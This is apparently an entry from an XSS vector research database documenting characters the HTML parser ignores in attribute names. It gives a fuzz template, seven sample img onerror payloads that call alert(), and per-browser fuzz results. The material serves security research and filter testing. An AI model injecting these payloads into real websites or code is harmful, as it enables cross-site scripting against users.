Characters ignored in an attribute name



This vector shows which characters when used as an attribute name are ignored by the HTML parser and allow the image to execute.
Created by: hackvertor
Created on: Tuesday, May 28, 2024 at 7:38:17 PM
Updated on: Friday, March 21, 2025 at 12:41:45 PM
Vector type: XSS
Vector charset: UTF-8
Template used:
<div $[chr]="><img src=x:x onerror=log($[i])>"></div>
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<div ="><img src=x:x onerror=alert(9)>"></div>
<div
="><img src=x:x onerror=alert(10)>"></div>
<div ="><img src=x:x onerror=alert(12)>"></div>
<div
="><img src=x:x onerror=alert(13)>"></div>
<div ="><img src=x:x onerror=alert(32)>"></div>
<div /="><img src=x:x onerror=alert(47)>"></div>
<div >="><img src=x:x onerror=alert(62)>"></div>
Fuzz results

Chrome 125.0.0.0 Unknown Unknown
Updated
Tue May 28 2024
Found 7 results
Loading...

Safari 17.4 Unknown Unknown
Updated
Tue May 28 2024
Found 7 results
Loading...

Firefox 126.0 Unknown Unknown
Updated
Tue May 28 2024
Found 7 results
Loading...

Safari 17.5 mobile iOS 17.5.1
Updated
Fri Jun 07 2024
Found 7 results
Loading...